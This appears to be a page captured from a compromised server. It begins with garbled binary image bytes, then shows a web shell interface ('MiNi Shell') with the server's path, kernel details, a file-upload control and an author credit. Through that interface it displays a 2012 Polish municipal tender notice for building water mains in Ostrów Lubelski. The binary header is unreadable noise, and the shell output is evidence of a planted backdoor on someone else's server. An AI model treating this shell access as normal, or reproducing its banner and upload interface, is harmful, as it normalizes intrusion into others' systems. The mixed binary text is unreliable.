JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120716/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120716/252772-N-2012.html

<p class="kh_header"><b>Ostrów Lubelski: Budowa sieci wodociągowej w ulicy Nowy Świat 
i na osiedlu Gościniec w Ostrowie Lubelskim</b><br>
<b>Numer ogłoszenia: 252772 - 2012; data zamieszczenia: 16.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Ostrów Lubelski , ul. Partyzantów 1, 21-110 Ostrów Lubelski, woj. lubelskie, tel. 081 8520003, 8520642, faks 081 8520642.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.ostrowlubelski.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa sieci wodociągowej w ulicy Nowy Świat 
i na osiedlu Gościniec w Ostrowie Lubelskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie sieci wodociągowej:
1.	przy ulicy Nowy Świat z rur typu SDR 17 PE 80 PN 8 do przesyłania wody o średnicy Dz110x6,6 i Dz90x5,4 łączonych za pomocą zgrzewania doczołowego i typowych złączek do rur PE o średnicy Dz40x2,4 mm łączonych za pomocą złączek elektrooporowych lub złączek zaciskowych . Długość sieci wodociągowych wynosi 706m w tym: z PE 110x6,6 - 48m; PE 90x5,4 - 630m; PE 40x2,4 - 28m;
2.	na osiedlu Gościniec - II etap realizacji o długości łącznej 1757 mb, w tym:
Dn 150 -  648 mb; Dn 100 - 1109 mb; przecisk Dn 273 - 20 mb; RO fi 250x14.2 PE - 6 mb; RO fi 200x11.4 PE - 22 mb; HP 80 - 8 szt.; zasuwy -  8 szt.

Szczegółowe określenie przedmiotu zamówienia zawarte jest w załącznikach Nr 7, 8 i 9 do SIWZ  na które składają się odpowiednio: kosztorysy ofertowe (przedmiary robót), dokumentacje projektowe, specyfikacja techniczna wykonania i odbioru robót..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu Wykonawcy robót budowlanych zamówień uzupełniających, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.21.50-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium  
1. Ustala się kwotę wadium dla zamówienia w wysokości: 10 000,00 zł (słownie: dziesięć tysięcy złotych 00/100); 
2. Wadium może być wnoszone w jednej lub kilku następujących formach: 
a)  pieniądzu; 
b)  poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo    
kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
c)  gwarancjach bankowych; 
d) gwarancjach ubezpieczeniowych; 
e)  poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.  
3. Wadium wnoszone w pieniądzu, wpłaca się przelewem na konto Powiatowy Bank Spółdzielczy w Lubartowie Oddział w Ostrowie Lubelskim na konto nr 11 8707 1032 0400 0811 2004 0003
z dopiskiem 
(Wadium w postępowaniu na budowę sieci wodociągowej w ulicy Nowy Świat i na osiedlu Gościniec w Ostrowie Lubelskim).
Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się dzień  
i godzinę uznania kwoty wadium na rachunku Zamawiającego. 
Wadium można wnieść do dnia, w którym upływa termin składania ofert, ale przed 
nadejściem godziny, do której powinny być złożone oferty. 
4. Dokument w formie gwarancji i poręczenia winien zawierać stwierdzenie, że na pierwsze 
pisemne żądanie Zamawiającego wzywające do zapłaty kwoty odpowiadającej wysokości 
wadium, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń. 
5. W przypadku wniesienia wadium w formie, o której mowa w ust. 2 lit. b e, do oferty 
należy dołączyć oryginał. 
6.  Wykonawca, który nie zabezpieczy oferty akceptowaną formą wadium zostanie przez 
Zamawiającego wykluczony z postępowania. 
7. Zamawiający zwróci niezwłocznie wadium: 
a) wszystkim Wykonawcom po wyborze najkorzystniejszej oferty lub unieważnieniu 
postępowania,  z  wyjątkiem  Wykonawcy,  którego  oferta  została  wybrana  jako najkorzystniejsza, z zastrzeżeniem ust. 8. 
b) Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, po zawarciu umowy  
w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania 
tej umowy, 
c) na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.  
8. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na 
wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których 
mowa  w  art.  25  ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn 
nieleżących po jego stronie. 
9.  Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami 
wynikającymi z umowy rachunku bankowego, na  którym  było  ono  przechowywane, 
pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew 
pieniędzy na rachunek bankowy wskazany przez Wykonawcę. 
10.  Zamawiający żąda ponownego wniesienia wadium przez Wykonawców, którym 
zwrócono wadium na podstawie ust. 7 lit. a, jeżeli w wyniku ostatecznego rozstrzygnięcia 
odwołania unieważniono czynność wykluczenia Wykonawcy lub odrzucenia oferty. 
Wykonawcy wnoszą wadium w terminie określonym przez Zamawiającego. 
11.  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta 
została wybrana: 
-  odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, 
-  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 
-  zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy. 
12. Wadium wniesione w formie gwarancji i poręczeń musi obejmować wszystkie przypadki, 
w których Wykonawca traci wadium na rzecz Zamawiającego (ust. 11). W przypadku, gdy 
dokumenty te  nie będą zabezpieczały w pełnym zakresie możliwych roszczeń 
Zamawiającego, Wykonawca zostanie wykluczony z postępowania.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek jeżeli wykaże, iż w okresie ostatnich 5 lat przed dniem 
składania ofert, a jeżeli okres działalności jest krótszy  -  w tym okresie wykonał zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył, co najmniej dwie roboty budowlane polegające na budowie sieci ciśnieniowych wodociągowych,  kanalizacyjnych z rur łączonych metodą zgrzewania, o wartości każdej z nich nie mniejszej niż 400 000 zł brutto. W przypadku składania oferty wspólnej warunek zostanie uznany przez Zamawiającego za spełniony, jeżeli Wykonawcy składający ofertę wspólną będą spełniać go łącznie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek dysponowania osobami zdolnymi do wykonania zamówienia, jeżeli wykaże się dysponowaniem następującymi osobami bądź osobą posiadającymi/posiadającą  uprawnienia budowlane do kierowania robotami budowlanymi  w specjalności instalacyjnej sanitarnej - sieci,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże się spełnieniem warunku dotyczącego sytuacji ekonomicznej jeżeli 
jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 200 000 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy 2. Kosztorys ofertowy 3. Pełnomocnictwo - w przypadku ustanowienia pełnomocnika</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zmiana postanowień zawartej umowy oraz harmonogramu robót może nastąpić wyłącznie, za zgodą obu Stron wyrażoną na piśmie w formie aneksu do umowy, pod rygorem nieważności takiej zmiany. 2.Zmiany przewidziane w umowie mogą być inicjowane przez Zamawiającego lub przez Wykonawcę. 3.Zmiany umowy
nie mogą wykraczać poza zakres świadczenia określonego w umowie. 4.Przedmiot świadczenia określony w umowie może zostać ograniczony lub zmieniony w przypadku: a)niedostępności na rynku materiałów lub urządzeń wskazanych w dokumentacji projektowej lub technicznej, spowodowanej zaprzestaniem produkcji
lub wycofaniem z rynku tych materiałów lub urządzeń; b)pojawienie się na rynku części, materiałów lub urządzeń nowszej generacji, pozwalających na zaoszczędzenie kosztów realizacji przedmiotu zamówienia lub kosztów eksploatacji wykonanego przedmiotu zamówienia, c)pojawienie się nowszej technologii wykonania
przedmiotu zamówienia, pozwalającej na zaoszczędzenie czasu realizacji zamówienia lub jego kosztów, jak również kosztów eksploatacji wykonanego przedmiotu zamówienia, d)konieczności zrealizowania robót przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w dokumentacji projektowej lub
specyfikacji technicznej, w sytuacji gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu zamówienia; e)odmiennych od przyjętych w dokumentacji projektowej warunków geologicznych (kategorie gruntu, kurzawka itp.), skutkujących niemożliwością zrealizowania
przedmiotu umowy przy dotychczasowych założeniach technologicznych; f)odmiennych od przyjętych w dokumentacji projektowej lub specyfikacji technicznej warunków terenowych, geologicznych, wodnych, istnienie niezinwentaryzowanych (nieujętych w dokumentacji) urządzeń, instalacji lub obiektów;
g)konieczności zrealizowania robót przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa; h)konieczności zaspokojenia roszczeń niemożliwych do jednoznacznego określenia w chwili zawierania umowy; 5.Zmiany, o których mowa w ust. 1, mogące dotyczyć
terminu realizacji przedmiotu umowy: a)zmiany spowodowane warunkami atmosferycznymi, w szczególności:
warunki atmosferyczne uniemożliwiające prowadzenie robót budowlanych, zgodnie z wymaganiami szczegółowych specyfikacji technicznych wykonania i odbioru robót budowlanych, klęski żywiołowe; b)zmiany spowodowane warunkami geologicznymi, terenowymi, archeologicznymi, wodnymi itp., w szczególności: -odmienne od przyjętych w dokumentacji projektowej warunki geologiczne (kategoriegruntu, skał itp.), - odmienne od przyjętych w dokumentacji projektowej warunki terenowe, w szczególność istnienie podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych; c)zmiany będące następstwem okoliczności leżących po
stronie Zamawiającego, w szczególności: -wstrzymanie realizacji umowy przez Zamawiającego, -konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji lub dokumentacji technicznej urządzeń, -będących
wynikiem zmiany obowiązujących przepisów oraz zmniejszeniu dofinansowania; d)zmiany będące następstwem działania organów administracji, w szczególności: -przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń itp. -odmowa wydania przez organy
administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek błędów w dokumentacji projektowej, - konieczność uzyskania wyroku sądowego lub innego orzeczenia sądu lub organu, którego konieczności nie przewidywano przy zawieraniu umowy, -konieczność zaspokojenia roszczeń lub oczekiwań osób trzecich - w
tym grup społecznych lub zawodowych nieartykułowanych lub niemożliwych do jednoznacznego określenia w chwili zawierania umowy, 6.Zmiany, o których mowa w ust. 1, mogą dotyczyć kadry biorącej udział w realizacji przedmiotu umowy. 7.Zmiany, o których mowa w ust. 1, mogą dotyczyć wartości i zakresu zamówienia oraz wynagrodzenia należnego wykonawcy: a)zmiana wartości zamówienia brutto w przypadku zmiany stawki podatku VAT, b)zmniejszenie zakresu przedmiotu umowy w granicach uzasadnionego interesu Zamawiającego, z jednoczesnym zmniejszeniem wynagrodzenia wynikającego z kosztorysu. Wysokość ostatecznego, zmniejszonego wynagrodzenia, zostanie ustalona na podstawie kosztorysu powykonawczego.
8.Zmiany, o których mowa w ust. 1, mogą także być spowodowane zmianami dotyczącymi dofinansowania realizacji przedmiotu zamówienia ze środków zewnętrznych, w tym unijnych oraz zasad finansowania inwestycji, o której mowa w § 1 umowy. 9.Zmiany, o których mowa w ust. 1, mogą dotyczyć zmiany
pełnomocnika Wykonawców, którym wspólnie udzielono zamówienie lub Wykonawców, którym wspólnie udzielono zamówienie, w przypadku ogłoszenia upadłości bądź likwidacji niektórych z Wykonawców, którym wspólnie udzielono zamówienie, z zachowaniem dyspozycji art. 141 ustawy. 10.Strony dopuszczają zmianę
podwykonawców, z uwzględnieniem § 7 ust. 2 umowy. 11.Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy - Prawo zamówień publicznych, w szczególności: a)zmiana danych teleadresowych Stron Umowy;
b)zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy (np. zmiana nr rachunku bankowego, sposobu opisywania faktur); c)zmiana numerów rachunku bankowego (konta) stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://umigostrowlubelski.bip.e-zeto.eu/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Ostrowie Lubelskim 
ul. Partyzantów 1 
21-110 Ostrów Lubelski
pokój nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.08.2012 godzina 10:30, miejsce: Urząd Miejski w Ostrowie Lubelskim 
ul. Partyzantów 1 
21-110 Ostrów Lubelski
kancelaria Urzędu Miejskiego w Ostrowie Lubelskim, pokój nr 8..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt  jest  współfinansowany  ze  środków  Programu Rozwoju Obszarów Wiejskich na lata 2007-2013 w ramach działania Podstawowe usługi dla gospodarki i ludności wiejskiej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com